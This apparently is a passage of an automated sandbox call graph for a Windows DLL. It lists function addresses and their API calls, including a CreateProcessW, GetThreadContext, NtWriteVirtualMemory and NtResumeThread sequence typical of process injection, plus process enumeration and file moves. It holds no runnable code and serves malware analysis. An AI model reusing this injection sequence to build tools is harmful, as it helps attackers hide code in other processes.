11981 1000ba2b GetCommandLineW CommandLineToArgvW 11887->11981 11888->11723 11990 1000d131 11890->11990 11892 1000bdba 11893 1000d001 11892->11893 11894 1000d01c 11893->11894 11895 10009192 2 API calls 11894->11895 11896 1000d026 11895->11896 12004 10014c3a 11896->12004 11898 1000d071 11900 10009e14 2 API calls 11898->11900 11899 1000d03b 11899->11898 11902 10014c3a 2 API calls 11899->11902 11901 1000bdd0 11900->11901 11903 10009971 11901->11903 11902->11899 11904 10009978 11903->11904 11905 1000997d MultiByteToWideChar 11903->11905 11904->11728 11906 10009991 11905->11906 11906->11728 11908 10009192 2 API calls 11907->11908 11909 1000d245 11908->11909 11910 10009192 2 API calls 11909->11910 11911 1000d256 11910->11911 11912 10014c3a 2 API calls 11911->11912 11913 1000d2af 11911->11913 11919 1000be0b 11911->11919 11912->11911 11914 10014c3a 2 API calls 11913->11914 11915 1000d2da 11913->11915 11914->11913 11916 10009e14 2 API calls 11915->11916 11917 1000d2e7 11916->11917 11918 10009e14 2 API calls 11917->11918 11918->11919 11920 1000dee4 11919->11920 11921 1000defc 11920->11921 11922 1000be1d 11921->11922 11923 1000dc93 6 API calls 11921->11923 11922->11733 11924 1000df14 11923->11924 11924->11922 11925 10009203 2 API calls 11924->11925 11925->11922 11927 1000b953 GetCurrentProcess IsWow64Process 11926->11927 11928 1000b964 11926->11928 11927->11928 11929 1000b967 11928->11929 11930 1000b971 11929->11930 11931 1000b976 GetSystemInfo 11929->11931 11930->11738 11931->11738 12009 10009d63 11932->12009 11936 1000bfb0 11935->11936 11937 10014aeb 11935->11937 11939 100096f3 11936->11939 11937->11936 11938 10014c3a 2 API calls 11937->11938 11938->11937 12015 1000967b 11939->12015 11942 1000b5e5 11944 1000b8ca 11942->11944 11943 10009192 2 API calls 11943->11944 11944->11943 11946 1000b8fd 11944->11946 11948 10009e14 2 API calls 11944->11948 12033 10009ac5 11944->12033 12021 1000c800 CreateToolhelp32Snapshot 11946->12021 11948->11944 11949 1000b919 11951 1000b936 11949->11951 12039 10009bbe 11949->12039 11951->11750 11953 1000bc1c 11952->11953 11954 1000bc2c 11953->11954 12048 1000bb68 GetCommandLineW CommandLineToArgvW 11953->12048 11954->11723 11957 1000936a memset 11956->11957 11958 1000c186 _vsnwprintf 11957->11958 11959 1000c1a3 11958->11959 11959->11744 11963 1000dc93 GetTokenInformation 11960->11963 11964 1000dcb5 GetLastError 11963->11964 11968 1000dcd2 11963->11968 11965 1000dcc0 11964->11965 11964->11968 11966 100091e7 RtlAllocateHeap 11965->11966 11967 1000dcc8 11966->11967 11967->11968 11969 1000dcd6 GetTokenInformation 11967->11969 11968->11866 11968->11867 11969->11968 11970 1000dceb 11969->11970 11971 10009203 2 API calls 11970->11971 11971->11968 11973 1000dc89 11972->11973 11974 1000dc5d GetLastError 11972->11974 11973->11871 11973->11872 11974->11973 11975 1000dc6a OpenProcessToken 11974->11975 11975->11973 11978 10009858 11977->11978 11980 1000986a 11977->11980 11979 100091e7 RtlAllocateHeap 11978->11979 11979->11980 11980->11878 11982 1000ba61 11981->11982 11983 1000bb19 11981->11983 11984 1000bab7 11982->11984 11986 1000ba85 lstrlenW 11982->11986 11983->11888 11984->11983 11985 1000bad9 GetCurrentDirectoryW 11984->11985 11987 100099ec 2 API calls 11985->11987 11986->11982 11988 1000bb00 11987->11988 11989 10009203 2 API calls 11988->11989 11989->11983 11991 1000936a memset 11990->11991 11992 1000d153 11991->11992 11993 100091b2 2 API calls 11992->11993 11994 1000d189 GetVolumeInformationW 11993->11994 11995 10009e2e 2 API calls 11994->11995 11996 1000d1be 11995->11996 11997 1000c172 2 API calls 11996->11997 11998 1000d1df lstrcatW 11997->11998 12002 1000cf22 11998->12002 12001 1000d205 12001->11892 12003 1000cf2a CharUpperBuffW 12002->12003 12003->12001 12005 10014c4a 12004->12005 12006 10014c7d lstrlenW 12005->12006 12007 10014c9a _ftol2_sse 12006->12007 12007->11899 12010 10009d9e GetNumberFormatA 12009->12010 12012 10009d7a 12009->12012 12011 10009dbe 12010->12011 12011->12011 12013 100091e7 RtlAllocateHeap 12011->12013 12012->12010 12014 100091cd 12013->12014 12014->11741 12016 1000968b 12015->12016 12016->12016 12017 10014c3a 2 API calls 12016->12017 12018 100096a6 12017->12018 12019 10014c3a 2 API calls 12018->12019 12020 100096da 12018->12020 12019->12018 12020->11942 12022 1000c859 12021->12022 12023 1000c82e 12021->12023 12022->11949 12024 1000936a memset 12023->12024 12025 1000c840 Process32First 12024->12025 12025->12022 12026 1000c867 12025->12026 12027 100091e7 RtlAllocateHeap 12026->12027 12028 1000c86e 12027->12028 12029 10009203 2 API calls 12028->12029 12030 1000c88d 12029->12030 12031 1000c8b4 FindCloseChangeNotification 12030->12031 12045 1000b56f 12030->12045 12031->12022 12035 10009ad9 12033->12035 12034 100091e7 RtlAllocateHeap 12038 10009b31 12034->12038 12035->12034 12036 10009ba8 12036->11944 12037 100091e7 RtlAllocateHeap 12037->12038 12038->12036 12038->12037 12042 10009c0a 12039->12042 12044 10009bcf 12039->12044 12040 10009c01 12041 10009203 2 API calls 12040->12041 12041->12042 12042->11949 12043 10009203 2 API calls 12043->12044 12044->12040 12044->12042 12044->12043 12046 1000b580 12045->12046 12047 1000b5d1 Sleep 12045->12047 12046->12047 12047->12030 12049 1000bb94 12048->12049 12050 1000bbe9 12048->12050 12049->12050 12051 1000bba9 GetCurrentDirectoryW 12049->12051 12050->11954 12052 100099ec 2 API calls 12051->12052 12053 1000bbd1 12052->12053 12054 10009203 2 API calls 12053->12054 12054->12050 12056 1000a66c 12055->12056 12057 100091e7 RtlAllocateHeap 12056->12057 12061 1000a703 12057->12061 12058 1000a760 12058->11756 12058->11758 12059 100091b2 2 API calls 12059->12061 12060 10009e2e 2 API calls 12060->12061 12061->12058 12061->12059 12061->12060 12062 1000984f RtlAllocateHeap 12061->12062 12062->12061 12064 1000a42f 12063->12064 12067 1000a43b 12063->12067 12109 1000a2ea 12064->12109 12067->11771 12069 1000936a memset 12068->12069 12070 1000cb8e 12069->12070 12071 1000936a memset 12070->12071 12072 1000cb9b CreateProcessW 12071->12072 12072->11771 12132 1000a51f 12073->12132 12076 1000aa0c 12076->11771 12077 1000936a memset 12078 1000a975 GetThreadContext 12077->12078 12078->12076 12079 1000a99b 12078->12079 12079->12076 12080 1000a9ce NtProtectVirtualMemory NtWriteVirtualMemory 12079->12080 12080->12076 12081 1000aa15 NtProtectVirtualMemory 12080->12081 12081->12076 12167 1000c08f 12082->12167 12085 1000aa73 GetLastError NtResumeThread 12087 1000aa93 FindCloseChangeNotification 12085->12087 12086 1000aaa6 12086->11771 12087->12086 12090 100091b2 2 API calls 12089->12090 12091 1000e24f 12090->12091 12092 100091b2 2 API calls 12091->12092 12093 1000e260 12092->12093 12094 1000c172 2 API calls 12093->12094 12095 1000e298 12094->12095 12096 100099ec 2 API calls 12095->12096 12097 1000e2b3 12096->12097 12098 1000e2e9 12097->12098 12101 1000e2fb 12097->12101 12100 10009e2e 2 API calls 12098->12100 12099 10009e2e 2 API calls 12102 1000e2f2 12099->12102 12100->12102 12101->12099 12102->11771 12104 1000a45e FreeLibrary 12103->12104 12107 1000a478 12103->12107 12105 10009203 2 API calls 12104->12105 12105->12107 12106 1000a49b 12106->11763 12107->12106 12108 10009203 2 API calls 12107->12108 12108->12106 12110 100091b2 2 API calls 12109->12110 12111 1000a302 12110->12111 12112 1000c172 2 API calls 12111->12112 12113 1000a339 12112->12113 12114 100091b2 2 API calls 12113->12114 12115 1000a358 12114->12115 12116 100099ec 2 API calls 12115->12116 12117 1000a372 12116->12117 12118 10009e2e 2 API calls 12117->12118 12119 1000a380 12118->12119 12120 100099ec 2 API calls 12119->12120 12121 1000a3a3 LoadLibraryW 12120->12121 12123 1000a3c6 12121->12123 12124 1000a3d4 12121->12124 12126 1000950e 3 API calls 12123->12126 12125 10009203 2 API calls 12124->12125 12127 1000a3e2 12125->12127 12126->12124 12128 1000936a memset 12127->12128 12129 1000a3f5 12128->12129 12130 10009203 2 API calls 12129->12130 12131 1000a407 12129->12131 12130->12131 12131->12067 12133 1000a53d NtAllocateVirtualMemory 12132->12133 12151 1000a5af 12132->12151 12134 1000a560 12133->12134 12133->12151 12152 10009252 12134->12152 12136 1000a570 12136->12151 12155 1000caf3 NtAllocateVirtualMemory 12136->12155 12139 1000a5b8 12142 10009203 2 API calls 12139->12142 12140 1000a5aa 12141 10009203 2 API calls 12140->12141 12141->12151 12143 1000a5bd 12142->12143 12144 10009252 RtlAllocateHeap 12143->12144 12145 1000a5e6 12144->12145 12146 1000a5fb NtWriteVirtualMemory 12145->12146 12145->12151 12147 1000a62a 12146->12147 12146->12151 12159 100144d8 12147->12159 12150 10009203 2 API calls 12150->12151 12151->12076 12151->12077 12153 100091e7 RtlAllocateHeap 12152->12153 12154 10009263 12153->12154 12154->12136 12156 1000a597 12155->12156 12157 1000cb28 NtWriteVirtualMemory 12155->12157 12156->12139 12156->12140 12157->12156 12158 1000cb3b NtProtectVirtualMemory 12157->12158 12158->12156 12160 100144f0 NtProtectVirtualMemory 12159->12160 12162 1000a63a 12159->12162 12160->12162 12163 1001456f 12160->12163 12162->12150 12163->12162 12164 1000936a memset 12163->12164 12165 100145a9 12164->12165 12166 100146e4 NtProtectVirtualMemory 12165->12166 12166->12162 12168 1000c0a8 12167->12168 12171 1000bfdc 12168->12171 12172 10014ae0 2 API calls 12171->12172 12173 1000bff4 12172->12173 12174 10009192 2 API calls 12173->12174 12175 1000c01e 12174->12175 12180 1000c133 12175->12180 12177 1000c07c 12178 10009e14 2 API calls 12177->12178 12179 1000aa59 12178->12179 12179->12085 12179->12086 12181 1000936a memset 12180->12181 12182 1000c147 _vsnprintf 12181->12182 12183 1000c161 12182->12183 12183->12177 12289 1000ab0b 12184->12289 12187 100114f8 12188 100091e7 RtlAllocateHeap 12187->12188 12189 10011503 12188->12189 12190 1001150d 12189->12190 12350 1000e841 12189->12350 12190->11805 12193 10011564 12195 10011589 12193->12195 12360 1000ea03 12193->12360 12194 10009192 2 API calls 12196 10011547 12194->12196 12195->11805 12356 1000980b 12196->12356 12200 1001143c 14 API calls 12202 10011585 12200->12202 12201 10011552 12203 10009e14 2 API calls 12201->12203 12202->11805 12203->12193 12368 1000aecb 12204->12368 12207 1000140b 12208 1000c08f 7 API calls 12207->12208 12209 10001428 12208->12209 12210 10002382 10 API calls 12209->12210 12212 1000133a 12209->12212 12211 10001462 12210->12211 12211->12212 12397 1000aeb1 12211->12397 12212->11810 12212->11811 12215 10001474 lstrcmpiW 12215->12212 12217 1000c08f 7 API calls 12216->12217 12218 1000239b 12217->12218 12219 100023a8 12218->12219 12220 10009999 2 API calls 12218->12220 12221 100023cb 12220->12221 12401 1000e96e 12221->12401 12223 100023db 12226 1000e96e 2 API calls 12223->12226 12227 100023ff 12223->12227 12224 10009203 2 API calls 12225 10001387 12224->12225 12228 1000129c 12225->12228 12226->12227 12227->12224 12229 1000aeb1 4 API calls 12228->12229 12230 100012a6 12229->12230 12231 100012b4 lstrcmpiW 12230->12231 12232 100012af 12230->12232 12233 100012e6 12231->12233 12234 100012ca 12231->12234 12232->11815 12236 10009203 2 API calls 12233->12236 12406 1000afa9 12234->12406 12236->12232 12240 100091e7 RtlAllocateHeap 12239->12240 12241 100011a4 12240->12241 12242 100011b7 GetDriveTypeW 12241->12242 12243 100011e8 12241->12243 12242->12243 12454 10002885 12243->12454 12246 100091b2 2 API calls 12247 10001211 12246->12247 12248 100099ec 2 API calls 12247->12248 12249 10001226 12248->12249 12250 10009e2e 2 API calls 12249->12250 12251 10001232 12250->12251 12252 10001249 12251->12252 12473 1000b496 12251->12473 12254 10009203 2 API calls 12252->12254 12255 1000125d 12254->12255 12257 10001276 12255->12257 12486 1000278b 12255->12486 12258 1000127a 12257->12258 12491 10001d6a 12257->12491 12531 1000b4af 12258->12531 12262 1000b4af 2 API calls 12263 10001295 12262->12263 12263->11814 12265 100091b2 2 API calls 12264->12265 12266 1001144b 12265->12266 12967 1000cd53 memset 12266->12967 12269 10009e2e 2 API calls 12270 10011471 12269->12270 12284 100114ea 12270->12284 12979 1000ae47 12270->12979 12273 100091e7 RtlAllocateHeap 12274 1001149c 12273->12274 12275 100016ec 2 API calls 12274->12275 12274->12284 12276 100114ae 12275->12276 12277 1000c172 2 API calls 12276->12277 12278 100114bd 12277->12278 12279 1000c493 2 API calls 12278->12279 12280 100114d0 12279->12280 12283 100114de 12280->12283 12982 1000b2b1 12280->12982 12282 10009203 2 API calls 12282->12284 12283->12282 12284->11815 12286 1000118a 12285->12286 12993 1000224b 12286->12993 12290 100091e7 RtlAllocateHeap 12289->12290 12291 1000ab35 12290->12291 12317 10001322 12291->12317 12328 1000cf78 12291->12328 12294 10009192 2 API calls 12295 1000ab75 12294->12295 12296 1000acb4 12295->12296 12301 1000aba2 12295->12301 12297 1000ad05 12296->12297 12298 1000acc6 12296->12298 12299 10009999 2 API calls 12297->12299 12300 1000acb0 12298->12300 12303 10009999 2 API calls 12298->12303 12299->12300 12302 10009e14 2 API calls 12300->12302 12301->12300 12338 10009999 12301->12338 12306 1000ad26 12302->12306 12303->12300 12305 10009203 2 API calls 12307 1000adbd 12305->12307 12306->12305 12315 1000ad82 12306->12315 12309 1000936a memset 12307->12309 12309->12315 12310 100091b2 2 API calls 12311 1000ac08 12310->12311 12312 100099ec 2 API calls 12311->12312 12316 1000ac1a 12312->12316 12313 10009203 2 API calls 12313->12317 12314 10009999 2 API calls 12318 1000ac91 12314->12318 12315->12313 12319 10009e2e 2 API calls 12316->12319 12317->11803 12317->12187 12321 10009203 2 API calls 12318->12321 12320 1000ac28 12319->12320 12344 100098c2 12320->12344 12321->12300 12324 10009203 2 API calls 12325 1000ac5f 12324->12325 12326 10009203 2 API calls 12325->12326 12327 1000ac6a 12326->12327 12327->12314 12329 1000cf91 12328->12329 12330 10014c3a 2 API calls 12329->12330 12331 1000cfa1 12330->12331 12332 10009192 2 API calls 12331->12332 12333 1000cfb0 12332->12333 12334 1000cfec 12333->12334 12336 10014c3a 2 API calls 12333->12336 12335 10009e14 2 API calls 12334->12335 12337 1000ab56 12335->12337 12336->12333 12337->12294 12339 100099ab 12338->12339 12340 100091e7 RtlAllocateHeap 12339->12340 12341 100099c8 12340->12341 12342 100099e5 12341->12342 12343 100099d4 lstrcatA 12341->12343 12342->12306 12342->12310 12342->12327 12343->12341 12345 100098f8 12344->12345 12346 100098cb 12344->12346 12345->12324 12347 100091e7 RtlAllocateHeap 12346->12347 12348 100098dd 12347->12348 12348->12345 12349 100098e5 MultiByteToWideChar 12348->12349 12349->12345 12351 1000e859 12350->12351 12355 1000e852 12350->12355 12352 100091e7 RtlAllocateHeap 12351->12352 12353 1000e883 12351->12353 12351->12355 12352->12353 12354 10009203 2 API calls 12353->12354 12353->12355 12354->12355 12355->12193 12355->12194 12357 10009816 12356->12357 12359 10009831 12356->12359 12358 100091e7 RtlAllocateHeap 12357->12358 12358->12359 12359->12201 12361 1000ea27 12360->12361 12364 10010e35 12361->12364 12366 10010e4e 12364->12366 12365 10010e6f lstrlenW 12367 1000ea39 12365->12367 12366->12365 12366->12366 12367->12200 12371 1000aedb 12368->12371 12376 1000affb 12371->12376 12374 10009203 2 API calls 12375 10001335 12374->12375 12375->12207 12377 1000b01d 12376->12377 12390 1000aaab 12377->12390 12379 1000aef4 12379->12374 12379->12375 12380 1000b027 12380->12379 12393 100100ae 12380->12393 12382 1000b0f4 12383 10009203 2 API calls 12382->12383 12383->12379 12384 1000b05b 12384->12382 12385 10010e35 lstrlenW 12384->12385 12386 1000b0ac 12385->12386 12387 1000b0cf 12386->12387 12389 10009252 RtlAllocateHeap 12386->12389 12388 10009203 2 API calls 12387->12388 12388->12382 12389->12387 12391 100091e7 RtlAllocateHeap 12390->12391 12392 1000aab7 12391->12392 12392->12380 12395 100100d4 12393->12395 12394 100100d8 12394->12384 12395->12394 12396 100091e7 RtlAllocateHeap 12395->12396 12396->12394 12398 1000aeb6 12397->12398 12399 1000affb 4 API calls 12398->12399 12400 10001470 12399->12400 12400->12212 12400->12215 12402 1000e978 12401->12402 12403 1000e97d 12401->12403 12402->12223 12404 1000e994 GetLastError 12403->12404 12405 1000e99f GetLastError 12403->12405 12404->12402 12405->12402 12422 1000afb7 12406->12422 12409 1000a14f SetFileAttributesW 12410 1000936a memset 12409->12410 12411 1000a17c 12410->12411 12412 10014c3a 2 API calls 12411->12412 12418 1000a19d 12411->12418 12413 1000a1b9 12412->12413 12414 1000c172 2 API calls 12413->12414 12415 1000a1ca 12414->12415 12416 100099ec 2 API calls 12415->12416 12417 1000a1db 12416->12417 12417->12418 12442 1000a07c 12417->12442 12418->12233 12421 10009203 2 API calls 12421->12418 12423 1000afc7 12422->12423 12426 1000b128 12423->12426 12427 1000b145 12426->12427 12439 100012db 12426->12439 12428 10014c3a 2 API calls 12427->12428 12427->12439 12429 1000b189 12428->12429 12430 100091e7 RtlAllocateHeap 12429->12430 12431 1000b19d 12430->12431 12432 10014ae0 2 API calls 12431->12432 12431->12439 12433 1000b1df 12432->12433 12434 10010e35 lstrlenW 12433->12434 12435 1000b220 12434->12435 12436 1000aaab RtlAllocateHeap 12435->12436 12440 1000b22c 12436->12440 12437 1000b296 12438 10009203 2 API calls 12437->12438 12438->12439 12439->12233 12439->12409 12440->12437 12441 10009203 2 API calls 12440->12441 12441->12437 12443 1000a09f 12442->12443 12444 1000a0a7 memset 12443->12444 12453 1000a116 12443->12453 12445 100091b2 2 API calls 12444->12445 12446 1000a0c3 12445->12446 12447 10014c3a 2 API calls 12446->12447 12448 1000a0df 12447->12448 12449 1000c172 2 API calls 12448->12449 12450 1000a0f5 12449->12450 12451 10009e2e 2 API calls 12450->12451 12452 1000a0fe MoveFileW 12451->12452 12452->12453 12453->12421 12539 100016d2 12454->12539 12459 10009e14 2 API calls 12460 100028c2 12459->12460 12461 100016d2 2 API calls 12460->12461 12472 10001205 12460->12472 12462 100028d1 12461->12462 12552 1000f949 12462->12552 12465 10009e14 2 API calls 12466 100028ee 12465->12466 12466->12472 12560 1000b480 12466->12560 12468 1000290b 12573 1000fcfb 12468->12573 12471 10009203 2 API calls 12471->12472 12472->12246 12645 1000f9a8 12473->12645 12475 1000b3be 12476 1000b4a7 12475->12476 12477 1000facb 3 API calls 12475->12477 12476->12252 12478 1000b3d1 12477->12478 12479 100091e7 RtlAllocateHeap 12478->12479 12480 1000b3d8 12479->12480 12481 1000b471 12480->12481 12483 1000b479 12480->12483 12484 10009281 3 API calls 12480->12484 12485 1000980b RtlAllocateHeap 12480->12485 12482 1000fcfb 6 API calls 12481->12482 12482->12483 12483->12252 12484->12480 12485->12480 12489 100027ff 12486->12489 12487 1000287e 12487->12257 12488 100091e7 RtlAllocateHeap 12488->12489 12489->12487 12489->12488 12490 10009203 2 API calls 12489->12490 12490->12489 12492 1000d214 8 API calls 12491->12492 12493 10001d82 12492->12493 12494 1000c08f 7 API calls 12493->12494 12495 10001d8e 12494->12495 12664 1000e920 12495->12664 12497 10001d9a 12498 10009559 8 API calls 12497->12498 12522 10001da3 12497->12522 12499 10001dbd 12498->12499 12669 10001b39 memset 12499->12669 12502 1000936a memset 12504 10001e1c 12502->12504 12503 10001f7c 12505 100091b2 2 API calls 12503->12505 12711 1000e605 12504->12711 12506 10001f86 12505->12506 12508 100099ec 2 API calls 12506->12508 12512 10001f9d 12508->12512 12509 10001fcd 12511 10009e2e 2 API calls 12509->12511 12516 10001fd9 12511->12516 12512->12509 12514 10009203 2 API calls 12512->12514 12513 10001e9e 12515 100091e7 RtlAllocateHeap 12513->12515 12514->12509 12517 10001efa 12515->12517 12518 10009203 2 API calls 12516->12518 12521 100091b2 2 API calls 12517->12521 12517->12522 12519 10002034 12518->12519 12520 10009203 2 API calls 12519->12520 12520->12522 12523 10001f13 12521->12523 12522->12258 12524 1000c172 2 API calls 12523->12524 12525 10001f48 12524->12525 12526 10009e2e 2 API calls 12525->12526 12527 10001f52 12526->12527 12716 1000c493 12527->12716 12530 10009203 2 API calls 12530->12522 12532 1000b4be 12531->12532 12538 1000128d 12531->12538 12533 10009203 2 API calls 12532->12533 12537 1000b4e3 12532->12537 12533->12532 12534 10009203 2 API calls 12535 1000b4ee 12534->12535 12536 10009203 2 API calls 12535->12536 12536->12538 12537->12534 12538->12262 12540 10009cbf 2 API calls 12539->12540 12541 100016e8 12540->12541 12542 1000ffae 12541->12542 12543 100098c2 2 API calls 12542->12543 12548 1000ffd8 12543->12548 12544 10010035 12547 10009203 2 API calls 12544->12547 12545 10014c3a 2 API calls 12546 1000fffd FindResourceW 12545->12546 12546->12544 12546->12548 12550 10010065 12547->12550 12548->12544 12548->12545 12549 100028b1 12549->12459 12550->12549 12551 10009252 RtlAllocateHeap 12550->12551 12551->12549 12553 100028e0 12552->12553 12554 1000f958 12552->12554 12553->12465 12555 100091e7 RtlAllocateHeap 12554->12555 12556 1000f962 12555->12556 12556->12553 12585 1000f84e 12556->12585 12559 10009203 2 API calls 12559->12553 12561 1000f949 4 API calls 12560->12561 12562 1000b3be 12561->12562 12563 1000b48e 12562->12563 12623 1000facb 12562->12623 12563->12468 12566 100091e7 RtlAllocateHeap 12570 1000b3d8 12566->12570 12567 1000b479 12567->12468 12568 1000b471 12569 1000fcfb 6 API calls 12568->12569 12569->12567 12570->12567 12570->12568 12571 10009281 3 API calls 12570->12571 12572 1000980b RtlAllocateHeap 12570->12572 12571->12570 12572->12570 12574 10002916 12573->12574 12575 1000fd0a 12573->12575 12574->12471 12575->12574 12576 1000fd44 12575->12576 12578 10009203 2 API calls 12575->12578 12577 1000fd54 12576->12577 12628 1000fe22 12576->12628 12580 1000fd6f 12577->12580 12581 10009203 2 API calls 12577->12581 12578->12575 12582 1000fd85 12580->12582 12583 10009203 2 API calls 12580->12583 12581->12580 12584 10009203 2 API calls 12582->12584 12583->12582 12584->12574 12586 100091e7 RtlAllocateHeap 12585->12586 12587 1000f863 12586->12587 12590 1000f88b 12587->12590 12594 1000f870 12587->12594 12599 1000fda1 12587->12599 12588 1000f90f 12591 10009203 2 API calls 12588->12591 12588->12594 12590->12588 12592 1000f8d9 12590->12592 12593 1000fda1 lstrlenW 12590->12593 12591->12594 12592->12588 12592->12594 12603 1001074c 12592->12603 12593->12592 12594->12553 12594->12559 12597 1000f929 12598 10009203 2 API calls 12597->12598 12598->12594 12600 1000fdc1 12599->12600 12601 10010e35 lstrlenW 12600->12601 12602 1000fde5 12601->12602 12602->12590 12604 100091e7 RtlAllocateHeap 12603->12604 12606 10010770 12604->12606 12605 10009203 2 API calls 12607 10010905 12605->12607 12608 100091e7 RtlAllocateHeap 12606->12608 12615 100108df 12606->12615 12609 10009203 2 API calls 12607->12609 12610 10010790 12608->12610 12611 10010913 12609->12611 12613 100091e7 RtlAllocateHeap 12610->12613 12610->12615 12612 1000f908 12611->12612 12614 10009203 2 API calls 12611->12614 12612->12588 12612->12597 12616 100107a4 12613->12616 12614->12612 12615->12605 12616->12615 12618 10009281 12616->12618 12619 100091e7 RtlAllocateHeap 12618->12619 12621 10009296 12619->12621 12620 100092be 12620->12616 12621->12620 12622 10009203 2 API calls 12621->12622 12622->12620 12626 1000faee 12623->12626 12624 100091e7 RtlAllocateHeap 12624->12626 12625 1000b3d1 12625->12566 12626->12624 12626->12625 12627 10009203 2 API calls 12626->12627 12627->12626 12629 100091e7 RtlAllocateHeap 12628->12629 12630 1000fe5b 12629->12630 12631 1000fe8e 12630->12631 12634 1000ff0c 12630->12634 12639 1000fe65 12630->12639 12640 1000f7d4 12631->12640 12633 1000fe9a 12636 10010e35 lstrlenW 12633->12636 12635 10010e35 lstrlenW 12634->12635 12637 1000ff04 12635->12637 12636->12637 12638 10009203 2 API calls 12637->12638 12638->12639 12639->12577 12641 10014c3a 2 API calls 12640->12641 12642 1000f7ed 12641->12642 12643 1000f81a 12642->12643 12644 10014c3a 2 API calls 12642->12644 12643->12633 12644->12642 12646 100091e7 RtlAllocateHeap 12645->12646 12647 1000f9c9 12646->12647 12648 1000fa01 12647->12648 12649 1000fa4f 12647->12649 12654 1000f9d3 12647->12654 12651 1000e841 3 API calls 12648->12651 12650 100091e7 RtlAllocateHeap 12649->12650 12652 1000fa5a 12650->12652 12653 1000fa0b 12651->12653 12652->12654 12655 1000fa74 12652->12655 12657 10009203 2 API calls 12652->12657 12653->12655 12656 1000f84e 4 API calls 12653->12656 12654->12475 12659 1000fa9c 12655->12659 12661 10009203 2 API calls 12655->12661 12658 1000fa25 12656->12658 12657->12655 12658->12652 12660 1000fa2b 12658->12660 12662 10009203 2 API calls 12659->12662 12663 10009203 2 API calls 12660->12663 12661->12659 12662->12654 12663->12654 12665 1000e934 12664->12665 12666 1000e944 GetLastError 12665->12666 12667 1000e93a GetLastError 12665->12667 12668 1000e951 12666->12668 12667->12668 12668->12497 12671 10001b6c 12669->12671 12670 10001b9f 12673 1000d214 8 API calls 12670->12673 12710 10001bd3 12670->12710 12671->12670 12723 10002aec 12671->12723 12674 10001bb1 12673->12674 12675 1000d001 6 API calls 12674->12675 12676 10001bc1 12675->12676 12677 10001bcf 12676->12677 12739 10001ad7 12676->12739 12677->12710 12747 10001a7a 12677->12747 12680 10001be4 12681 1000d22a 6 API calls 12680->12681 12682 10001c0c 12681->12682 12758 10002bd3 12682->12758 12685 100099ec 2 API calls 12686 10001c3a 12685->12686 12687 10001c5c 12686->12687 12689 1000984f RtlAllocateHeap 12686->12689 12688 1000ab0b 10 API calls 12687->12688 12691 10001c7b 12688->12691 12690 10001c4e 12689->12690 12692 1000984f RtlAllocateHeap 12690->12692 12691->12710 12792 1000af7e 12691->12792 12692->12687 12695 1000afb7 6 API calls 12696 10001ca4 12695->12696 12796 1000af59 12696->12796 12699 10001cc6 12700 10001cd7 12699->12700 12702 1000b4fe 7 API calls 12699->12702 12806 1000c3b5 GetSystemTimeAsFileTime 12700->12806 12702->12700 12704 10001cde 12808 1000af2b 12704->12808 12708 10001d06 12708->12710 12823 1000cbc8 12708->12823 12710->12502 12710->12503 12963 1000e512 12711->12963 12714 1000e512 RtlAllocateHeap 12715 10001e4d 12714->12715 12715->12503 12715->12513 12717 1000936a memset 12716->12717 12718 1000c4ab 12717->12718 12719 1000936a memset 12718->12719 12720 1000c4b7 12719->12720 12721 10001f66 12720->12721 12722 1000c50e GetExitCodeProcess 12720->12722 12721->12530 12722->12721 12724 10002b08 12723->12724 12725 10002ba0 12724->12725 12726 100016ec 2 API calls 12724->12726 12725->12670 12727 10002b18 12726->12727 12728 100099ec 2 API calls 12727->12728 12729 10002b2a 12728->12729 12730 10009e2e 2 API calls 12729->12730 12731 10002b35 12730->12731 12732 100016ec 2 API calls 12731->12732 12733 10002b3f 12732->12733 12857 1001014a 12733->12857 12736 10009e2e 2 API calls 12737 10002b5b 12736->12737 12738 10009203 2 API calls 12737->12738 12738->12725 12740 1000d214 8 API calls 12739->12740 12741 10001ae0 12740->12741 12863 1000e42c 12741->12863 12743 10001aee 12743->12677 12745 10009203 2 API calls 12746 10001b32 12745->12746 12746->12677 12748 100098c2 2 API calls 12747->12748 12749 10001a85 12748->12749 12750 100091b2 2 API calls 12749->12750 12751 10001aad 12750->12751 12752 100099ec 2 API calls 12751->12752 12753 10001ab9 12752->12753 12754 10009e2e 2 API calls 12753->12754 12755 10001ac4 12754->12755 12756 10009203 2 API calls 12755->12756 12757 10001acf 12756->12757 12757->12680 12872 1000d086 12758->12872 12760 10002bec 12761 10002bf8 12760->12761 12762 10002c6d 12760->12762 12763 100016ec 2 API calls 12761->12763 12764 10002aec 5 API calls 12762->12764 12765 10002c02 12763->12765 12766 10002c7f 12764->12766 12771 10002c23 12765->12771 12772 10002c2c 12765->12772 12767 10002c84 12766->12767 12768 10002cce 12766->12768 12888 10009fb0 memset memset 12767->12888 12769 10002ba8 4 API calls 12768->12769 12779 10002c6a 12769->12779 12881 10002ba8 12771->12881 12776 100016ec 2 API calls 12772->12776 12773 10002c8f 12775 100016ec 2 API calls 12773->12775 12777 10002c99 12775->12777 12778 10002c36 12776->12778 12780 100099ec 2 API calls 12777->12780 12781 100099ec 2 API calls 12778->12781 12783 10002ce3 CreateDirectoryW 12779->12783 12791 10001c18 12779->12791 12784 10002cbe 12780->12784 12785 10002c53 12781->12785 12782 10009e2e 2 API calls 12782->12779 12786 10002cef 12783->12786 12787 10009e2e 2 API calls 12784->12787 12788 10009e2e 2 API calls 12785->12788 12790 10009203 2 API calls 12786->12790 12786->12791 12787->12779 12789 10002c28 12788->12789 12789->12782 12790->12791 12791->12685 12791->12710 12793 1000af92 12792->12793 12794 1000b128 6 API calls 12793->12794 12795 10001c97 12794->12795 12795->12695 12797 1000af2b 6 API calls 12796->12797 12798 10001cb4 12797->12798 12798->12699 12799 1000b4fe 12798->12799 12800 1000b568 12799->12800 12804 1000b50f 12799->12804 12800->12699 12801 1000aedb 4 API calls 12801->12804 12802 1000b533 GetLastError 12802->12804 12803 1000af59 6 API calls 12803->12804 12804->12800 12804->12801 12804->12802 12804->12803 12805 1000af7e 6 API calls 12804->12805 12805->12804 12807 1000c3e7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12806->12807 12807->12704 12809 1000b128 6 API calls 12808->12809 12810 10001cea 12809->12810 12810->12708 12811 1001163b 12810->12811 12812 1001164d 12811->12812 12813 10009252 RtlAllocateHeap 12812->12813 12821 10011657 12812->12821 12814 10011667 12813->12814 12815 1000ea03 lstrlenW 12814->12815 12814->12821 12816 1001167e 12815->12816 12817 100116b8 12816->12817 12819 1000cbc8 6 API calls 12816->12819 12818 10009203 2 API calls 12817->12818 12818->12821 12820 100116ab 12819->12820 12820->12817 12892 1001135d 12820->12892 12821->12708 12824 1000cbd8 12823->12824 